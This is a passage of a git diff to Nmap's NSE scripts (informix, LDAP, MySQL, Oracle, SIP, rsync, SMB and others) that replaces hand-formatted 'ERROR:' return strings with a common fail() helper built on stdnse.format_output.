stdnse.format_output(false, "No credentials specified (see informix-table.username and informix-table.password)") end end diff --git a/scripts/informix-tables.nse b/scripts/informix-tables.nse index 9f6e5c610..ba52513f4 100644 --- a/scripts/informix-tables.nse +++ b/scripts/informix-tables.nse @@ -57,6 +57,8 @@ dependencies = { "informix-brute" } portrule = shortport.port_or_service( { 1526, 9088, 9090, 9092 }, "informix", "tcp", "open") +local function fail (err) return stdnse.format_output(false, err) end + action = function( host, port ) local helper local status, data @@ -77,7 +79,7 @@ action = function( host, port ) user = nmap.registry['informix-brute'][1]["username"] pass = nmap.registry['informix-brute'][1]["password"] else - return " \n ERROR: No credentials specified (see informix-table.username and informix-table.password)" + return fail("No credentials specified (see informix-table.username and informix-table.password)") end end @@ -94,7 +96,7 @@ action = function( host, port ) local databases status, databases = helper:GetDatabases() if ( not(status) ) then - return " \n ERROR: Failed to retrieve a list of databases" + return fail("Failed to retrieve a list of databases") end for _, db in ipairs(databases) do diff --git a/scripts/ip-forwarding.nse b/scripts/ip-forwarding.nse index 6ca79c483..017f2aeee 100644 --- a/scripts/ip-forwarding.nse +++ b/scripts/ip-forwarding.nse @@ -72,7 +72,7 @@ icmpEchoRequest = function(ifname, host, addr) return status end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host) @@ -93,7 +93,7 @@ action = function(host) end if ( target == host.ip ) then - return ("\n ERROR: Target can not be the same as the scanned host") + return fail("Target can not be the same as the scanned host") end if (icmpEchoRequest(ifname, host, target)) then diff --git a/scripts/iscsi-brute.nse b/scripts/iscsi-brute.nse index 38f841ffd..ae5ebbbbf 100644 --- a/scripts/iscsi-brute.nse +++ b/scripts/iscsi-brute.nse @@ -66,7 +66,7 @@ action = function( host, port ) local target = stdnse.get_script_args('iscsi-brute.target') if ( not(target) ) then - return "ERROR: No target specified (see iscsi-brute.target)" + return stdnse.format_output(false, "No target specified (see iscsi-brute.target)") end local helper = iscsi.Helper:new( host, port ) diff --git a/scripts/isns-info.nse b/scripts/isns-info.nse index e1226948c..c27913e99 100644 --- a/scripts/isns-info.nse +++ b/scripts/isns-info.nse @@ -34,7 +34,7 @@ author = "Patrik Karlsson" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"safe", "discovery"} -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) local helper = isns.Helper:new(host, port) diff --git a/scripts/krb5-enum-users.nse b/scripts/krb5-enum-users.nse index b5268b235..88a1ffd4d 100644 --- a/scripts/krb5-enum-users.nse +++ b/scripts/krb5-enum-users.nse @@ -360,6 +360,8 @@ local function checkUserThread( host, port, realm, user, result ) condvar "signal" end +local function fail (err) return stdnse.format_output(false, err) end + action = function( host, port ) local realm = stdnse.get_script_args("krb5-enum-users.realm") @@ -368,17 +370,17 @@ action = function( host, port ) -- did the user supply a realm if ( not(realm) ) then - return "ERROR: No Kerberos REALM was supplied, aborting ..." + return fail("No Kerberos REALM was supplied, aborting ...") end -- does the realm appear to exist if ( not(isValidRealm(host, port, realm)) ) then - return "ERROR: Invalid Kerberos REALM, aborting ..." + return fail("Invalid Kerberos REALM, aborting ...") end -- load our user database from unpwdb local status, usernames = unpwdb.usernames() - if( not(status) ) then return "ERROR: Failed to load unpwdb usernames" end + if( not(status) ) then return fail("Failed to load unpwdb usernames") end -- start as many threads as there are names in the list local threads = {} diff --git a/scripts/ldap-novell-getpass.nse b/scripts/ldap-novell-getpass.nse index 23f51021b..8157b3131 100644 --- a/scripts/ldap-novell-getpass.nse +++ b/scripts/ldap-novell-getpass.nse @@ -52,6 +52,8 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"}) +local function fail (err) return stdnse.format_output(false, err) end + function action(host,port) local username = stdnse.get_script_args("ldap-novell-getpass.username") @@ -59,15 +61,14 @@ function action(host,port) local account = stdnse.get_script_args("ldap-novell-getpass.account") if ( not(username) ) then - return "\n ERROR: No username was supplied (ldap-novell-getpass.username)" + return fail("No username was supplied (ldap-novell-getpass.username)") end if ( not(account) ) then - return "\n ERROR: No account was supplied (ldap-novell-getpass.account)" + return fail("No account was supplied (ldap-novell-getpass.account)") else -- do some basic account validation if ( not(account:match("^[Cc][Nn]=.*,") ) ) then - return "\n ERROR: The account argument should be specified as:\n" .. - " \"CN=name,OU=orgunit,O=org\"" + return fail("The account argument should be specified as: \"CN=name,OU=orgunit,O=org\"") end end @@ -76,7 +77,7 @@ function action(host,port) local anon_bind = bin.pack("H", "300c020101600702010304008000" ) local socket, _, opt = comm.tryssl( host, port, anon_bind, nil ) if ( not(socket) ) then - return "\n ERROR: Failed to connect to LDAP server" + return fail("Failed to connect to LDAP server") end local status, errmsg = ldap.bindRequest( socket, { @@ -106,7 +107,7 @@ function action(host,port) data = ldap.encode( { _ldaptype = '30', bin.pack("H", "020102") .. data } ) status = socket:send(data) - if ( not(status) ) then return "ERROR: Failed to send request" end + if ( not(status) ) then return fail("Failed to send request") end status, data = socket:receive() if ( not(status) ) then return data end @@ -120,7 +121,7 @@ function action(host,port) if ( rescode ~= 0 ) then local errmsg = ( #response >= 4 ) and response[4] or "An unknown error occurred" - return "\n ERROR: " .. errmsg + return fail(errmsg) end -- make sure we get a NMAS Get Password Response back from the server @@ -134,6 +135,6 @@ function action(host,port) table.insert(output, ("Password: %s"):format(universal_pw)) return stdnse.format_output(true, output) else - return "\n ERROR: No password was found" + return fail("No password was found") end end diff --git a/scripts/ldap-search.nse b/scripts/ldap-search.nse index 3f94e2cb9..7d58dd930 100644 --- a/scripts/ldap-search.nse +++ b/scripts/ldap-search.nse @@ -115,6 +115,7 @@ dependencies = {"ldap-brute"} portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"}) +local function fail (err) return stdnse.format_output(false, err) end function action(host,port) local status @@ -189,7 +190,7 @@ function action(host,port) if not status then stdnse.debug1("ldap-search failed to bind: %s", errmsg) - return " \n ERROR: Authentication failed" + return fail("Authentication failed") end -- or if ldap-brute found us something elseif ( accounts ) then @@ -219,7 +220,7 @@ function action(host,port) elseif qfilter == "custom" then if searchAttrib == nil or searchValue == nil then - return "\n\nERROR: Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter." + return fail("Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter.") end if string.find(searchValue, '*') == nil then filter = { op=ldap.FILTER.equalityMatch, obj=searchAttrib, val=searchValue } @@ -230,7 +231,7 @@ function action(host,port) elseif qfilter == "all" or qfilter == nil then filter = nil -- { op=ldap.FILTER} else - return " \n\nERROR: Unsupported Quick Filter: " .. qfilter + return fail("Unsupported Quick Filter: " .. qfilter) end if type(attribs) == 'string' then @@ -252,7 +253,7 @@ function action(host,port) if not status then if ( searchResEntries:match("DSID[-]0C090627") and not(username) ) then - return "ERROR: Failed to bind as the anonymous user" + return fail("Failed to bind as the anonymous user") else stdnse.debug1("ldap.searchRequest returned: %s", searchResEntries) return diff --git a/scripts/llmnr-resolve.nse b/scripts/llmnr-resolve.nse index be0124c13..5dcc88ba5 100644 --- a/scripts/llmnr-resolve.nse +++ b/scripts/llmnr-resolve.nse @@ -184,7 +184,7 @@ action = function() interface = getInterface(mcast) end if not interface then - return ("\n ERROR: Couldn't get interface for %s"):format(mcast) + return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast)) end -- Launch listener thread diff --git a/scripts/maxdb-info.nse b/scripts/maxdb-info.nse index f6eeeaeb5..adf6270b4 100644 --- a/scripts/maxdb-info.nse +++ b/scripts/maxdb-info.nse @@ -126,6 +126,8 @@ local function parseDatabases(data) return tab.dump(result) end +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) -- this could really be more elegant, but it has to do for now local handshake = "5a000000035b000001000000ffffffff000004005a000000000242000409000000400000d03f00000040000070000000000500000004000000020000000300000749343231360004501c2a035201037201097064626d73727600" @@ -139,17 +141,17 @@ action = function(host, port) status, data = exchPacket(socket, bin.pack("H", handshake)) if ( not(status) ) then - return "\n ERROR: Failed to perform handshake with MaxDB server" + return fail("Failed to perform handshake with MaxDB server") end status, data = exchPacket(socket, bin.pack("H", dbm_version)) if ( not(status) ) then - return "\n ERROR: Failed to request version information from server" + return fail("Failed to request version information from server") end local version_info = parseVersion(data) if ( not(version_info) ) then - return "\n ERROR: Failed to parse version information from server" + return fail("Failed to parse version information from server") end local result, filter = {}, {"Version", "Build", "OS", "Instroot", "Sysname"} @@ -160,7 +162,7 @@ action = function(host, port) status, data = exchCommand(socket, bin.pack("H", db_enum)) socket:close() if ( not(status) ) then - return "\n ERROR: Failed to request version information from server" + return fail("Failed to request version information from server") end local dbs = parseDatabases(data) table.insert(result, { name = "Databases", dbs } ) diff --git a/scripts/membase-brute.nse b/scripts/membase-brute.nse index a5e3ba81d..9f2483446 100644 --- a/scripts/membase-brute.nse +++ b/scripts/membase-brute.nse @@ -68,7 +68,7 @@ Driver = { } -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end local function getMechs(host, port) local helper = membase.Helper:new(host, port) diff --git a/scripts/membase-http-info.nse b/scripts/membase-http-info.nse index 7cd11adf4..859ef6612 100644 --- a/scripts/membase-http-info.nse +++ b/scripts/membase-http-info.nse @@ -42,7 +42,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(8091, "http", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end local filter = { ["parsed[1]['nodes'][1]['os']"] = { name = "OS" }, diff --git a/scripts/memcached-info.nse b/scripts/memcached-info.nse index c2bb69c80..8c9470eb2 100644 --- a/scripts/memcached-info.nse +++ b/scripts/memcached-info.nse @@ -60,7 +60,7 @@ local order = { "auth_enabled_sasl" } -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end local function mergetab(tab1, tab2) for k, v in pairs(tab2) do diff --git a/scripts/metasploit-xmlrpc-brute.nse b/scripts/metasploit-xmlrpc-brute.nse index 234689db6..f8d6c996c 100644 --- a/scripts/metasploit-xmlrpc-brute.nse +++ b/scripts/metasploit-xmlrpc-brute.nse @@ -87,7 +87,7 @@ action = function(host, port) local xmlreq='core.version\n\0' local socket, _, opts = comm.tryssl(host, port, xmlreq, { recv_first = false } ) if ( not(socket) ) then - return "\n ERROR: Failed to determine whether SSL was needed or not" + return stdnse.format_output(false, "Failed to determine whether SSL was needed or not") end local engine = brute.Engine:new(Driver, host, port, opts) diff --git a/scripts/mmouse-exec.nse b/scripts/mmouse-exec.nse index db6e0f48a..5e3e088c6 100644 --- a/scripts/mmouse-exec.nse +++ b/scripts/mmouse-exec.nse @@ -133,7 +133,7 @@ local function executeCmd(socket, app, keys) return true end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/mrinfo.nse b/scripts/mrinfo.nse index a28c73e63..bb0921144 100644 --- a/scripts/mrinfo.nse +++ b/scripts/mrinfo.nse @@ -251,7 +251,7 @@ action = function() interface = getInterface(target) end if not interface then - return ("\n ERROR: Couldn't get interface for %s"):format(target) + return stdnse.format_output(false, ("Couldn't get interface for %s"):format(target)) end stdnse.debug1("will send to %s via %s interface.", target, interface.shortname) diff --git a/scripts/mtrace.nse b/scripts/mtrace.nse index 5b6f5f3d7..ccd246eea 100644 --- a/scripts/mtrace.nse +++ b/scripts/mtrace.nse @@ -344,7 +344,7 @@ action = function() interface = getInterface(firsthop) end if not interface then - return ("\n ERROR: Couldn't get interface for %s"):format(firsthop) + return stdnse.format_output(false, ("Couldn't get interface for %s"):format(firsthop)) end -- Destination defaults to our own host diff --git a/scripts/mysql-audit.nse b/scripts/mysql-audit.nse index b32298a29..181a1e6f9 100644 --- a/scripts/mysql-audit.nse +++ b/scripts/mysql-audit.nse @@ -93,6 +93,8 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(3306, "mysql") local TEMPLATE_NAME, ADMIN_ACCOUNTS = "", "" +local function fail (err) return stdnse.format_output(false, err) end + local function loadAuditRulebase( filename ) local rules = {} @@ -103,7 +105,7 @@ local function loadAuditRulebase( filename ) local file, err = loadfile(filename, "t", env) if ( not(file) ) then - return false, ("ERROR: Failed to load rulebase:\n%s"):format(err) + return false, fail(("Failed to load rulebase:\n%s"):format(err)) end @@ -120,11 +122,11 @@ action = function( host, port ) local filename = stdnse.get_script_args("mysql-audit.filename") if ( not(filename) ) then - return "\n No audit rulebase file was supplied (see mysql-audit.filename)" + return fail("No audit rulebase file was supplied (see mysql-audit.filename)") end if ( not(username) ) then - return "\n No username was supplied (see mysql-audit.username)" + return fail("No username was supplied (see mysql-audit.username)") end local status, tests = loadAuditRulebase( filename ) @@ -139,7 +141,7 @@ action = function( host, port ) status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt ) - if ( not(status) ) then return "ERROR: Failed to authenticate" end + if ( not(status) ) then return fail("Failed to authenticate") end local results = {} for _, test in ipairs(tests) do diff --git a/scripts/mysql-dump-hashes.nse b/scripts/mysql-dump-hashes.nse index bee723628..a88c35bc7 100644 --- a/scripts/mysql-dump-hashes.nse +++ b/scripts/mysql-dump-hashes.nse @@ -40,7 +40,7 @@ portrule = shortport.port_or_service(3306, "mysql") local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username") local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password") or "" -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function getCredentials() -- first, let's see if the script has any credentials as arguments? diff --git a/scripts/mysql-empty-password.nse b/scripts/mysql-empty-password.nse index 47dc378da..88a55da3a 100644 --- a/scripts/mysql-empty-password.nse +++ b/scripts/mysql-empty-password.nse @@ -40,7 +40,7 @@ action = function( host, port ) for _, v in ipairs( users ) do local status, response = socket:connect(host, port) - if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end + if( not(status) ) then return stdnse.format_output(false, "Failed to connect to mysql server") end status, response = mysql.receiveGreeting( socket ) if ( not(status) ) then diff --git a/scripts/mysql-query.nse b/scripts/mysql-query.nse index 149176337..e1dad0134 100644 --- a/scripts/mysql-query.nse +++ b/scripts/mysql-query.nse @@ -44,7 +44,7 @@ local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password") or "" local arg_query = stdnse.get_script_args(SCRIPT_NAME .. ".query") local arg_noheaders = stdnse.get_script_args(SCRIPT_NAME .. ".noheaders") or false -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function getCredentials() -- first, let's see if the script has any credentials as arguments? @@ -114,5 +114,5 @@ action = function(host, port) socket:close() end end - return stdnse.format_output(true, (last_error and ("ERROR: %s"):format(last_error) or result)) + return stdnse.format_output(not last_error, last_error or result) end diff --git a/scripts/nat-pmp-mapport.nse b/scripts/nat-pmp-mapport.nse index b9b82a76e..7f6811f05 100644 --- a/scripts/nat-pmp-mapport.nse +++ b/scripts/nat-pmp-mapport.nse @@ -55,7 +55,7 @@ local arg_protocol= stdnse.get_script_args(SCRIPT_NAME .. ".protocol") local arg_lifetime= stdnse.get_script_args(SCRIPT_NAME .. ".lifetime") or 3600 local arg_op = stdnse.get_script_args(SCRIPT_NAME .. ".op") or "map" -local function fail(str) return "\n ERROR: " .. str end +local function fail(str) return stdnse.format_output(false, str) end action = function(host, port) diff --git a/scripts/ndmp-fs-info.nse b/scripts/ndmp-fs-info.nse index 1da148ef3..36153f372 100644 --- a/scripts/ndmp-fs-info.nse +++ b/scripts/ndmp-fs-info.nse @@ -1,6 +1,7 @@ local ndmp = require "ndmp" local shortport = require "shortport" local tab = require "tab" +local stdnse = require "stdnse" description = [[ Lists remote file systems by querying the remote device using the Network @@ -43,7 +44,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(10000, "ndmp", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/ndmp-version.nse b/scripts/ndmp-version.nse index 209a36c0f..61acdef8a 100644 --- a/scripts/ndmp-version.nse +++ b/scripts/ndmp-version.nse @@ -1,6 +1,7 @@ local ndmp = require "ndmp" local nmap = require "nmap" local shortport = require "shortport" +local stdnse = require "stdnse" description = [[ Retrieves version information from the remote Network Data Management Protocol @@ -26,7 +27,7 @@ categories = {"version"} portrule = shortport.version_port_or_service(10000, "ndmp", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function vendorLookup(vendor) if ( vendor:match("VERITAS") ) then diff --git a/scripts/nessus-xmlrpc-brute.nse b/scripts/nessus-xmlrpc-brute.nse index 9ac5a23f4..2963b34e3 100644 --- a/scripts/nessus-xmlrpc-brute.nse +++ b/scripts/nessus-xmlrpc-brute.nse @@ -96,7 +96,7 @@ Driver = disconnect = function( self ) return true end, } -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/oracle-brute-stealth.nse b/scripts/oracle-brute-stealth.nse index 85cb20434..f2a9bba2f 100644 --- a/scripts/oracle-brute-stealth.nse +++ b/scripts/oracle-brute-stealth.nse @@ -141,6 +141,7 @@ Driver = } +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) local DEFAULT_ACCOUNTS = "nselib/data/oracle-default-accounts.lst" @@ -150,20 +151,20 @@ action = function(host, port) local mode = arg_accounts and "accounts" or "default" if ( not(sid) ) then - return "\n ERROR: Oracle instance not set (see oracle-brute-stealth.sid or tns.sid)" + return fail("Oracle instance not set (see oracle-brute-stealth.sid or tns.sid)") end if ( arg_johnfile ) then johnfile = io.open(arg_johnfile, "w") if ( not(johnfile) ) then - return ("\n ERROR: Failed to open %s for writing"):format(johnfile) + return fail(("Failed to open %s for writing"):format(johnfile)) end end local helper = tns.Helper:new( host, port, sid ) local status, result = helper:Connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to oracle server" + return fail("Failed to connect to oracle server") end helper:Close() @@ -177,12 +178,12 @@ action = function(host, port) if ( mode == "default" ) then local f = nmap.fetchfile(DEFAULT_ACCOUNTS) if ( not(f) ) then - return ("\n ERROR: Failed to find %s"):format(DEFAULT_ACCOUNTS) + return fail(("Failed to find %s"):format(DEFAULT_ACCOUNTS)) end f = io.open(f) if ( not(f) ) then - return ("\n ERROR: Failed to open %s"):format(DEFAULT_ACCOUNTS) + return fail(("Failed to open %s"):format(DEFAULT_ACCOUNTS)) end engine.iterator = brute.Iterators.credential_iterator(f) diff --git a/scripts/oracle-brute.nse b/scripts/oracle-brute.nse index 33035bbee..5e4b54026 100644 --- a/scripts/oracle-brute.nse +++ b/scripts/oracle-brute.nse @@ -176,6 +176,7 @@ Driver = } +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) local DEFAULT_ACCOUNTS = "nselib/data/oracle-default-accounts.lst" @@ -185,13 +186,13 @@ action = function(host, port) local mode = "default" if ( not(sid) ) then - return "\n ERROR: Oracle instance not set (see oracle-brute.sid or tns.sid)" + return fail("Oracle instance not set (see oracle-brute.sid or tns.sid)") end local helper = tns.Helper:new( host, port, sid ) local status, result = helper:Connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to oracle server" + return fail("Failed to connect to oracle server") end helper:Close() @@ -207,12 +208,12 @@ action = function(host, port) if ( mode == "default" ) then f = nmap.fetchfile(DEFAULT_ACCOUNTS) if ( not(f) ) then - return ("\n ERROR: Failed to find %s"):format(DEFAULT_ACCOUNTS) + return fail(("Failed to find %s"):format(DEFAULT_ACCOUNTS)) end f = io.open(f) if ( not(f) ) then - return ("\n ERROR: Failed to open %s"):format(DEFAULT_ACCOUNTS) + return fail(("Failed to open %s"):format(DEFAULT_ACCOUNTS)) end engine.iterator = brute.Iterators.credential_iterator(f) diff --git a/scripts/oracle-enum-users.nse b/scripts/oracle-enum-users.nse index 0870c3fd4..b387cfac8 100644 --- a/scripts/oracle-enum-users.nse +++ b/scripts/oracle-enum-users.nse @@ -66,6 +66,8 @@ local function checkAccount( host, port, user ) return true, auth["AUTH_VFR_DATA"] end +local function fail (err) return stdnse.format_output(false, err) end + action = function( host, port ) local known_good_accounts = { "system", "sys", "dbsnmp", "scott" } @@ -76,12 +78,12 @@ action = function( host, port ) local usernames if ( not( nmap.registry.args['oracle-enum-users.sid'] ) and not( nmap.registry.args['tns.sid'] ) ) then - return "ERROR: Oracle instance not set (see oracle-enum-users.sid or tns.sid)" + return fail("Oracle instance not set (see oracle-enum-users.sid or tns.sid)") end status, usernames = unpwdb.usernames() if( not(status) ) then - return stdnse.format_output(true, "ERROR: Failed to load the usernames dictionary") + return fail("Failed to load the usernames dictionary") end -- Check for some known good accounts @@ -95,7 +97,7 @@ action = function( host, port ) -- did we atleast get a single salt back? if ( count < 20 ) then - return stdnse.format_output(true, "ERROR: None of the known accounts were detected (oracle < 11g)") + return fail("None of the known accounts were detected (oracle < 11g)") end -- Check for some known bad accounts @@ -112,7 +114,7 @@ action = function( host, port ) -- It's unlikely that we hit 3 random combinations as valid users if ( count > 60 ) then - return stdnse.format_output(true, ("ERROR: %d of %d random accounts were detected (Patched Oracle 11G or Oracle 11G R2)"):format(count/20, 10)) + return fail(("%d of %d random accounts were detected (Patched Oracle 11G or Oracle 11G R2)"):format(count/20, 10)) end for user in usernames do diff --git a/scripts/rdp-enum-encryption.nse b/scripts/rdp-enum-encryption.nse index 05a9cc0e4..3298398c5 100644 --- a/scripts/rdp-enum-encryption.nse +++ b/scripts/rdp-enum-encryption.nse @@ -40,6 +40,8 @@ categories = {"safe", "discovery"} portrule = shortport.port_or_service(3389, "ms-wbt-server") +local function fail (err) return stdnse.format_output(false, err) end + local function enum_protocols(host, port) local PROTOCOLS = { ["Native RDP"] = 0, @@ -60,7 +62,7 @@ local function enum_protocols(host, port) for k, v in pairs(PROTOCOLS) do local comm = rdp.Comm:new(host, port) if ( not(comm:connect()) ) then - return false, "ERROR: Failed to connect to server" + return false, fail("Failed to connect to server") end local cr = rdp.Request.ConnectionRequest:new(v) local status, response = comm:exch(cr) @@ -118,7 +120,7 @@ local function enum_ciphers(host, port) for k, v in get_ordered_ciphers() do local comm = rdp.Comm:new(host, port) if ( not(comm:connect()) ) then - return false, "ERROR: Failed to connect to server" + return false, fail("Failed to connect to server") end local cr = rdp.Request.ConnectionRequest:new() diff --git a/scripts/redis-brute.nse b/scripts/redis-brute.nse index 0a5ee75c3..6ae508efc 100644 --- a/scripts/redis-brute.nse +++ b/scripts/redis-brute.nse @@ -2,6 +2,7 @@ local brute = require "brute" local creds = require "creds" local redis = require "redis" local shortport = require "shortport" +local stdnse = require "stdnse" description = [[ Performs brute force passwords auditing against a Redis key-value store. @@ -29,7 +30,7 @@ categories = {"intrusive", "brute"} portrule = shortport.port_or_service(6379, "redis") -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end Driver = { diff --git a/scripts/redis-info.nse b/scripts/redis-info.nse index c75c44780..8aa839156 100644 --- a/scripts/redis-info.nse +++ b/scripts/redis-info.nse @@ -37,7 +37,7 @@ dependencies = {"redis-brute"} portrule = shortport.port_or_service(6379, "redis") -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end local function cb_parse_version(host, port, val) port.version.version = val diff --git a/scripts/riak-http-info.nse b/scripts/riak-http-info.nse index f0c296c61..432c7b0f1 100644 --- a/scripts/riak-http-info.nse +++ b/scripts/riak-http-info.nse @@ -103,7 +103,7 @@ local order = { } -local function fail(err) return ("\n ERROR: %s"):format(err) end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/rlogin-brute.nse b/scripts/rlogin-brute.nse index aac85a424..a68381ee5 100644 --- a/scripts/rlogin-brute.nse +++ b/scripts/rlogin-brute.nse @@ -146,7 +146,8 @@ arg_timeout = (arg_timeout or 10) * 1000 action = function(host, port) if ( not(nmap.is_privileged()) ) then - return "\n ERROR: rlogin-brute needs Nmap to be run in privileged mode" + stdnse.verbose1("Script must be run in privileged mode. Skipping.") + return stdnse.format_output(false, "rlogin-brute needs Nmap to be run in privileged mode") end local options = { diff --git a/scripts/rpcap-info.nse b/scripts/rpcap-info.nse index d181e91f7..2353c8fbb 100644 --- a/scripts/rpcap-info.nse +++ b/scripts/rpcap-info.nse @@ -40,7 +40,7 @@ dependencies = {"rpcap-brute"} portrule = shortport.port_or_service(2002, "rpcap", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end local function getInfo(host, port, username, password) diff --git a/scripts/rsync-brute.nse b/scripts/rsync-brute.nse index 9e2ce00a6..4bc240276 100644 --- a/scripts/rsync-brute.nse +++ b/scripts/rsync-brute.nse @@ -88,16 +88,18 @@ local function isModuleValid(host, port, module) return false, ("Brute pre-check failed for unknown reason: (%s)"):format(data) end +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local mod = stdnse.get_script_args(SCRIPT_NAME .. ".module") if ( not(mod) ) then - return "\n ERROR: rsync-brute.module was not supplied" + return fail("rsync-brute.module was not supplied") end local status, err = isModuleValid(host, port, mod) if ( not(status) ) then - return ("\n ERROR: %s"):format(err) + return fail(err) end local engine = brute.Engine:new(Driver, host, port, { module = mod }) diff --git a/scripts/rsync-list-modules.nse b/scripts/rsync-list-modules.nse index bd38a74e0..9e9c5a5be 100644 --- a/scripts/rsync-list-modules.nse +++ b/scripts/rsync-list-modules.nse @@ -26,21 +26,23 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(873, "rsync", "tcp") +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local helper = rsync.Helper:new(host, port, { module = "" }) if ( not(helper) ) then - return "\n ERROR: Failed to create rsync.Helper" + return fail("Failed to create rsync.Helper") end local status, err = helper:connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to rsync server" + return fail("Failed to connect to rsync server") end local modules = {} status, modules = helper:listModules() if ( not(status) ) then - return "\n ERROR: Failed to retrieve a list of modules" + return fail("Failed to retrieve a list of modules") end return stdnse.format_output(true, modules) end diff --git a/scripts/sip-call-spoof.nse b/scripts/sip-call-spoof.nse index 4448166c7..b50032459 100644 --- a/scripts/sip-call-spoof.nse +++ b/scripts/sip-call-spoof.nse @@ -140,7 +140,7 @@ action = function(host, port) session = sip.Session:new(host, port) status = session:connect() if not status then - return "ERROR: Failed to connect to the SIP server." + return stdnse.format_output(false, "Failed to connect to the SIP server.") end local ringing, result, waittime = invitespoof(session, ua, from, src, extension, timeout) diff --git a/scripts/sip-enum-users.nse b/scripts/sip-enum-users.nse index a5db30155..7e8e19f7e 100644 --- a/scripts/sip-enum-users.nse +++ b/scripts/sip-enum-users.nse @@ -120,11 +120,11 @@ end local useriterator = function(list) local f = nmap.fetchfile(list) or list if not f then - return false, ("\n ERROR: Couldn't find %s"):format(list) + return false, ("Couldn't find %s"):format(list) end f = io.open(f) if ( not(f) ) then - return false, ("\n ERROR: Failed to open %s"):format(list) + return false, ("Failed to open %s"):format(list) end return function() for line in f:lines() do @@ -145,12 +145,12 @@ local test404 = function(host, port) session = sip.Session:new(host, port) status = session:connect() if not status then - return false, "ERROR: Failed to connect to the SIP server." + return false, "Failed to connect to the SIP server." end status, response = registerext(session, randext) if not status then - return false, "ERROR: No response from the SIP server." + return false, "No response from the SIP server." end if response:getErrorCode() ~= 404 then return false, "Server not returning 404 for random extension." @@ -217,6 +217,8 @@ Driver = { end, } +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local result, lthreads = {}, {} local status, err @@ -230,19 +232,19 @@ action = function(host, port) -- min extension should be less than max extension. if minext > maxext then - return "ERROR: maxext should be greater or equal than minext." + return fail("maxext should be greater or equal than minext.") end -- If not set to zero, number of digits to pad up to should have less or -- equal the number of digits of max extension. if padding ~= 0 and #tostring(maxext) > padding then - return "ERROR: padding should be greater or equal to number of digits of maxext." + return fail("padding should be greater or equal to number of digits of maxext.") end -- We test for false positives by sending a request for a random extension -- and checking if it did return a 404. status, err = test404(host, port) if not status then - return err + return fail(err) end local engine = brute.Engine:new(Driver, host, port) @@ -252,7 +254,7 @@ action = function(host, port) if users then local usernames, err = useriterator(usersfile) if not usernames then - return err + return fail(err) end -- Concat numbers and users iterators iterator = unpwdb.concat_iterators(iterator, usernames) diff --git a/scripts/sip-methods.nse b/scripts/sip-methods.nse index 88ad5c4c8..a51a5ec4e 100644 --- a/scripts/sip-methods.nse +++ b/scripts/sip-methods.nse @@ -45,7 +45,7 @@ action = function(host, port) session = sip.Session:new(host, port) status = session:connect() if not status then - return "ERROR: Failed to connect to the SIP server." + return stdnse.format_output(false, "Failed to connect to the SIP server.") end status, response = session:options() diff --git a/scripts/smb-enum-processes.nse b/scripts/smb-enum-processes.nse index 193aa3798..6d28c7d89 100644 --- a/scripts/smb-enum-processes.nse +++ b/scripts/smb-enum-processes.nse @@ -198,11 +198,7 @@ action = function(host) -- Get the process list local status, result = msrpcperformance.get_performance_data(host, "230") if status == false then - if nmap.debugging() > 0 then - return "ERROR: " .. result - else - return nil - end + return stdnse.format_output(false, result) end -- Get the process table diff --git a/scripts/smb-ls.nse b/scripts/smb-ls.nse index 5f16d99f9..29060d456 100644 --- a/scripts/smb-ls.nse +++ b/scripts/smb-ls.nse @@ -65,7 +65,7 @@ local function is_dir(fe) return ( bit.band(fe.attrs, 16) == 16 ) end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host) diff --git a/scripts/smbv2-enabled.nse b/scripts/smbv2-enabled.nse index d90479e77..6cc6d3f15 